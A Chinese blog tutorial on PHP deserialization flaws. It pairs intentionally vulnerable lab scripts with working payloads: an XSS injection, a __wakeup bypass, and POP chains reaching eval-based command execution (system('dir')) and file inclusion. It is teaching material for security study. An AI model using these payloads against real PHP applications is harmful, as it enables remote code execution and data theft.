反序列化篇

已于 2024-04-16 18:16:23 修改
阅读量227 收藏
点赞数
文章标签: 安全 笔记
于 2023-10-30 14:56:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63527808/article/details/134119539
版权

一、序列化与反序列化

1、序列化:

        序列化是指将数据结构或对象转换为一串字节流的过程,使其可以存储、传输或缓存时进行持久化。(PHP 中使用 serialize() 函数可以将数据结构或对象进行序列化,得到一个表示序列化后数据的字符串)

2、反序列化:

        反序列化是指将序列化后的数据进行解码和还原,恢复为原始的数据结构或对象的过程。反序列化是序列化的逆过程。(PHP 中使用 unserialize() 函数对序列化后的字符串进行反序列化,将其还原为原始的数据)

1、序列化后的类型
(1)i 整型(int)
(2)d 浮点类型(double)
(3)b 布尔类型(boolean)
(4)a 数组类型(array)
(5)O 对象类型(class)
(6)N NULL 类型(null)

常见格式:O:长度:"类名":变量数:{变量类型:变量名长度:"变量名":变量值;}

2、变量长度的注意点
(1)中文汉字或中文字符长度加3

3、对于不同的访问类型:
(1)public 就是变量本身
(2)protect \00*\00变量名,指明字符长度的 s 要大写 S
(3)provite \00类名\00变量名,指明字符长度的 s 要大写 S

3、说明示例1

(1)源码:

<?php
	class Seria{
		public $name = "chunchun";
		protected $age = 11;
		private $username = "limb";

		public function __construct(){
			echo "序列化结束"."<br>";
		}
	}

	$c = new Seria();
	echo serialize($c);
?>

(2)执行结果

4、说明示例2

(1)源码:

<?php
	class Seria{
		public $name = "chunchun";
		protected $age = 11;
		private $username = "limb";

		public function __construct(){
			echo "序列化结束"."<br>";
		}
	}

	$ser = new Seria();
	$a = serialize($ser);
	print_r(unserialize($a));
	echo "<br>";
	$c = $_GET['cc'] ?? 'O:5:"Seria":3:{s:4:"name";s:8:"chunchun";s:6:"%00*%00age";i:11;s:15:"%00Seria%00username";s:4:"limb";}';
	print_r(unserialize($c));
?>

 (2)payload:

http://localhost/serialize/test2/test1.php?cc=O:5:%22Seria%22:3:{s:4:%22name%22;s:8:%22chunchun%22;s:6:%22%00*%00age%22;i:11;s:15:%22%00Seria%00username%22;s:4:%22limb%22;}

(3)效果:

 5、说明示例3:

(1)源码:

<?php
	class Seria{
		public $name = "chunchun";
		protected $age = 11;
		private $username = "limb";

		public function __construct(){
			echo "序列化结束"."<br>";
		}
	}

	$b = new Seria();
	$cc = serialize($b);
	print_r(unserialize($cc));
	echo "<br>";

	$a = $_POST['cc'] ?? 'O:5:"Seria":3:{s:4:"name";s:8:"chunchun";S:6:"\00*\00age";i:11;S:15:"\00Seria\00username";s:4:"limb";}';
	print_r(unserialize($a));
?>

(2)payload:

(3)效果:

6、魔术方法:

__construct() 当一个对象创建时被调用

__destruct() 当一个对象销毁前被调用

__sleep() 在对象被序列化前被调用

__wakeup() 将在反序列化之后立即被调用

__toString() 当一个对象被当做字符串使用时被调用

__get() 访问一个不存在或不可访问的属性时调用

__set() 当一个不存在或不可访问的属性赋值时调用

__invoke() 调用函数的方式调用一个对象时的回应方法

__call() 使用不存在或无法访问的方法时调用

__callStatic() 使用不存在或无法访问的静态方法时调用

__isset() 对不存在或不可访问的属性使用 isset() 或 empty() 函数时调用

__unset() 对不可访问或不存的属性使用 unset() 函数时调用

__invoke() 当你像使用函数一样使用一个对象时调用

__clone() 当你使用 clone 函数复制一个对象时调用

__autoload() 当你尝试加载未定义的类时调用

二、反序列化漏洞:

1、漏洞简述:

        反序列化的数据本质上来说是没有危害的,用户可控数据进行反序列化是存在危害的,反序列化的危害, 关键还是在于可控或不可控。

三、反序列化漏洞的利用

1、XSS:以上述实例代码 2 为例,若序列化的值可控:

(1)payload:

http://localhost/serialize/test2/test1.php?cc=O:5:%22Seria%22:3:{s:4:%22name%22;s:25:%22%3Cscript%3Ealert(1)%3C/script%3E%22;s:6:%22%00*%00age%22;i:11;s:15:%22%00Seria%00username%22;s:4:%22limb%22;}

(2)显示效果:

(3)POST 的效果也是一样的:

2、 绕过 __wakeup:

(1)示例源码:

<?php 
	class Getflag{

		protected $file='test3.php';
		function __destruct(){
			if(!empty($this->file)) {
				if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false){
					show_source(dirname (__FILE__).'/'.$this->file); 
				}else{
					echo 'Wrong filename.';
				}
			}else{
				echo "kong";
			}
		}
		
		function __wakeup(){
			$this->file = 'test3.php';
		}
	}

	$f = $_GET['file'];
	echo $f."<br>";
	$ff = base64_decode($f);
	echo $ff."<br>";
	$c = unserialize($ff)."<br>";
?>

(2)flag.php

<?php
	$flag = "chunchun";
?>

(3)payload 获取

第一步:编写 exp获取序列化后的字符串

<?php 
	class Getflag{

	    protected $file='flag.php';

	    function __destruct() {
	        if(!empty($this->file)) {
	            if(strchr($this-> file,"\\")===false && strchr($this->file, '/')===false)
	            	show_source(dirname (__FILE__).'/'.$this ->file); 
	        }else{
	           echo 'Wrong filename.';
	        }
	    }
	}
 
	$data= new Getflag();
	$ser= serialize($data);
	echo $ser;
	echo "</br>";
	echo base64_encode($ser)."<br>";
	echo base64_encode('O:7:"Getflag":2:{S:7:"\00*\00file";s:8:"flag.php";}')."<br>";
?>
O:7:"Getflag":1:{s:7:"*file";s:8:"flag.php";}
因为有 protected 属性,改写为:
O:7:"Getflag":1:{S:7:"\00*\00file";s:8:"flag.php";}

第二步:增加变量个数,以此来绕过 __wakeup ,然后进行 base64 编码:

增加变量个数后改为:
O:7:"Getflag":2:{S:7:"\00*\00file";s:8:"flag.php";}
base64 编码后为:
Tzo3OiJHZXRmbGFnIjoyOntTOjc6IlwwMCpcMDBmaWxlIjtzOjg6ImZsYWcucGhwIjt9

第三步:进行访问 flag.php 的尝试

注意:如果 php 高于 7.0 则没有该漏洞。

3、 pop 链构造1

(1)示例源码:

<?php
	header('Content-Type: text/html; charset=utf-8');
	
	class First{
		private $t1;

		function __construct(){
			$this->t1 = new test2();
		}

		function __destruct(){
			$this->t1->excute();
		}
	}

	class Second{
		public function excute(){
			echo "走错了";
		}
	}

	class Third{
		public $t3;

		public function excute(){
			eval($this->t3);
		}
	}

	if(isset($_GET['cc'])){
		$c = $_GET['cc'];
		$d = unserialize($c);
		print_r($d);
		echo "<br>";
	}else{
		echo "无参数";
	}
?>

(2)获取 payload :

<?php

	header('Content-Type: text/html; charset=utf-8');
	class First{
		private $t1;

		function __construct(){
			$this->t1 = new Third();
		}
	}

	class Third{
		public $t3 = "system('dir');";

		public function excute(){
			eval($this->t3);
		}
	}

	$exp = new First();
	echo serialize($exp);
?>

(3)输入 payload:

字符串的序列化值:
O:5:"First":1:{s:9:"Firstt1";O:5:"Third":1:{s:2:"t3";s:14:"system('dir');";}}
加入 url 编码:
O:5:"First":1:{s:9:"%00First%00t1";O:5:"Third":1:{s:2:"t3";s:14:"system('dir');";}}

?cc=O:5:"First":1:{s:9:"%00First%00t1";O:5:"Third":1:{s:2:"t3";s:14:"system('dir');";}}

4、pop 链构造2

(1)源代码:

<?php
	class Modifier{  //  1、需要满足 $var = "flag.php",然后要调用 __invoke() 函数,需要把 Modifier 当函数执行
		protected $var;
		public function append($value){
			include($value);
		}
		public function __invoke(){
            $this->append($this->var);
        }
	}

    class Show{
        public $source;
        public $str;
        public function __construct($file = 'index.php'){
            $this->source = $file;
            echo 'Welcome to '.$this->source."<br>";

        }

        public function __toString(){  //  3、要访问 Test 中不存在的属性,所以要触发 __toString() 函数,然后满足 $str = new Test(),然后把 Show 当作字符串来使用
            return $this->str->source;
        }

        public function __wakeup(){
            if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)){
                echo "hacker";
                $this->source = "index.php";
            }
        }// 4、preg_match() 是对字符串进行处理,所以要使得 $source 等于 new Show(),然后触发 __toString
    }

    class Test{  // 2、因为 return $fun() 是吧 $fun 变量当作函数执行,所以要满足 $p = new Modifier(),然后要调用 __get() 函数,所以要访问 Test 中没有的属性
        public $p;
        public function __construct(){
            $this->p = array();
        }

        public function __get($key){
            $fun = $this->p;
            return $fun();
        }
    }

    if(isset($_GET['pop'])){
        unserialize($_GET['pop']);
    }else{
        $a = new Show();
        highlight_file(__FILE__);
    }
?>

 (2)获取 payload:

<?php
    class Modifier{
        protected $var = "flag.php";
        public function append($value){
            include($value);
        }
        public function __invoke(){
            $this->append($this->var);
        }
    }

    class Show{
        public $source;
        public $str;
        public function __construct(){
//            $this->source = new Show();
            $this->str = new Test();
        }
    }

    class Test{
        public $p;
    }


    $exp = new Show();
    $exp->source = new Show();
    $exp->source->str->p = new Modifier();
    echo serialize($exp);
?>

(3)输入 payload:

O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"*var";s:8:"flag.php";}}}s:3:"str";O:4:"Test":1:{s:1:"p";N;}}
因为存在 protected 属性,所以更改为:
O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"%00*%00var";s:8:"flag.php";}}}s:3:"str";O:4:"Test":1:{s:1:"p";N;}}

?pop=O:4:"Show":2:{s:6:"source";O:4:"Show":2:{s:6:"source";N;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:6:"%00*%00var";s:8:"flag.php";}}}s:3:"str";O:4:"Test":1:{s:1:"p";N;}}
YUkawa539
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详解PHP序列化和反序列化原理
10-18
文章给大家分享了下PHP反序列化漏洞系列之PHP序列化和反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
Java安全漫谈 - 07.反序列化(1)1
08-03
但首先要理解的是,“反序列化漏洞”是对一类漏洞的泛指,而不是专指某种反序列化方法导致的漏洞,比如Jackson反序列化漏洞和Java readObject造成的
springmvc fastjson 反序列化时间格式化方法(推荐)
10-20
下面小编就为大家带来一springmvc fastjson 反序列化时间格式化方法(推荐)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Java反序列化攻击
01-21
Java 反序列化攻击漏洞由FoxGlove 的近的一博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。   由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,也意味着使用了这些包的服务器(目前发现有WebSphere, WebLogic,JBoss),第三方框架(Spring,Groovy),第三方应用(Jenkins),以及依赖于这些服务器,框架或者直接/间接引用这些包的应用都会受到威胁,这样的应用的数量会以百万计。   说到漏洞存在的原因,根本还在于 Java 序列化自身的缺陷,众
深入理解Java对象的序列化与反序列化的应用
09-05
文章是对Java中对象的序列化与反序列化进行了详细的分析介绍,需要的朋友参考下
反序列化(Unserialize)漏洞详解
qq_49422880的博客
09-28 9951
序列化和反序列化漏洞分析   序列化(serialize) 就将对象的状态信息转换为可以存储或传输的形式的过程 在序列化期间,对象将当前的状态写入到临时或持久性的存储区 【将状态信息保存为字符串】。   反序列化(unserialize) 就是把序列化之后的字符串在转化为对象。 其实在序列化的过程中是没有任何的漏洞的,产生漏洞的主要的原因就是在反序列化的过程中,通过我们的恶意篡改会产生魔法函数绕过,字符逃逸,远程命令执行等漏洞,最早发现这些漏洞的大佬是真的牛。 一、简单的魔法函数 魔法函数 调用
序列化和反序列化
ChineseSoftware的博客
01-17 3万+
一、序列化:将 Java 对象转换成字节流的过程 1️⃣序列化过程:是指把一个 Java 对象变成二进制内容,实质上就是一个 byte[]。因为序列化后可以把 byte[] 保存到文件中,或者把 byte[] 通过网络传输到远程(IO),如此就相当于把 Java 对象存储到文件或者通过网络传输出去了。 2️⃣一个 Java 对象要能序列化,必须实现一个特殊的java.io.Serializable接口,它的定义如下: public interface Serializable {} Serializab.
什么是序列化? 如何实现(反)序列化 序列化的应用
qq_43564410的博客
08-23 1万+
1. 什么是序列化与反序列化,什么情况需要序列化1.1 序列化序列化是什么序列化的目的什么情况需要序列化1.2 反序列反序列化是什么反序列化的目的2. Java中的序列化与反序列化2.1 如何实现序列化Java序列化的规定序列化的API实现(反)序列化的示例对象在硬盘上的存储方式2.2 利用序列化,实现深拷贝什么时候不要序列化Java中如何防止序列化 1. 什么是序列化与反序列化,什么情况需要序列化 1.1 序列化 序列化是什么 从百度百科中可以得知,序列化 (Serialization)是将对象的状态信.
反序列化漏洞详解
热门推荐
LJH1999ZN的博客
03-07 3万+
目录 一、什么是序列化和反序列化 二、什么是反序列化漏洞 三、序列化函数(serialize) 四、反序列化(unserialize) ​五、什么是PHP魔术方法 六、一些常见的魔术方法 七、魔术方法的利用 八、反序列化漏洞的利用 1.__destruct()函数 2.__wakeup() 3.toString() ​九、反序列化漏洞的防御 一、什么是序列化和反序列化 序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串.
java中序列化与反序列化
weixin_43167662的博客
09-19 1764
一、基本概念 1、序列化和反序列化的定义: (1)Java序列化就是指把Java对象转换为字节序列的过程 Java反序列化就是指把字节序列恢复为Java对象的过程。 (2)序列化最重要的作用:在传递和保存对象时.保证对象的完整性和可传递性。对象转换为有序字节流,以便在网络上传输或者保存在本地文件中。 反序列化的最重要的作用:根据字节流中保存的对象状态及描述信息,通过反序列化重建对象。 总结:核心作用就是对象状态的保存和重建。(整个过程核心点就是字节流中所保存的对象状态及描述信息) 2、j
Json序列化和反序列化方法解析
10-26
文章主要是对Json序列化和反序列化方法进行了介绍,需要的朋友可以过来参考下,希望对大家有所帮助
老生常谈Python序列化和反序列化
09-21
下面小编就为大家带来一老生常谈Python序列化和反序列化。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Java安全漫谈 - 08.反序列化(2)1
08-03
Java安全漫谈 - 08.反序列化(2)1
Django框架中序列化和反序列化的例子
09-18
今天小编就为大家分享一Django框架中序列化和反序列化的例子,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
深入理解C#序列化与反序列化的详解
09-05
文章是对C#中序列化与反序列化进行了详细的分析介绍,需要的朋友参考下
序列化、反序列化原理和Protobuf实现机制
长沙老码农
01-22 5190
(1)Java序列化是指把Java对象转换为字节序列的过程,而Java反序列化是指把字节序列恢复为Java对象的过程;(2)
序列化与反序列化——最全教程(含代码示例)
freeline的博客
06-16 1921
python的序列化与反序列内容
序列化与反序列化介绍
shsh1234567890的博客
01-23 1万+
序列化与反序列化介绍
spark(kryo)、hadoop(writable)、jdk(serializable)-序列化
DCHAO的博客
10-07 675
一、SRC 一个类在jvm中是有结构的,但即使是在jvm中,也是一堆数据。网络只能传文本,所以需要序列化和反序列化。 通过几种方式的序列化后文本输出到本地文件,可以对比下大小。 二、jdk的序列化 将类的上级所有层次都序列化,相当于把类的所有描述信息写在文本中传输。效率较低。 ObjectOutputStream底层就是调用的DataOutputStream,只不过把类的层级、包名和数据一起传了。 三、hadoop 如果提前告知对方类的结构,则只需要传数据。效率会高。MR就是这种思路,所以MR用的是xxxW
反序列化LocalDateTime
最新发布
09-08
LocalDateTime的反序列化在某些情况下可能比较复杂,并且可能无法成功。其中一些主要的场景包括Spring MVC自带的LocalDateTime序列化和反序列化以及Jackson处理后的LocalDateTime序列化和反序列化。为了解决这个问题,可以使用Jackson库的注解来进行序列化和反序列化操作。 如果想要将LocalDateTime序列化为Spring MVC可以反序列化的数组形式,可以使用`@JsonSerialize(using = LocalDateTimeSerializer.class)`注解。另外,如果想要反序列化特定的日期格式,可以使用`@JsonFormat(pattern = "yyyy-MM-dd'T'HH:mm:ss.SSS'Z'")`注解。 然而,有时候即使使用了以上的注解,仍然无法成功反序列化LocalDateTime。这可能是因为Jackson序列化LocalDateTime为"month"等形式,导致Controller层无法解析。 综上所述,反序列化LocalDateTime可能面临一些复杂的问题,尤其是在Spring MVC和Jackson库中。为了解决这些问题,需要使用合适的注解来配置序列化和反序列化的格式,并注意可能出现的解析问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值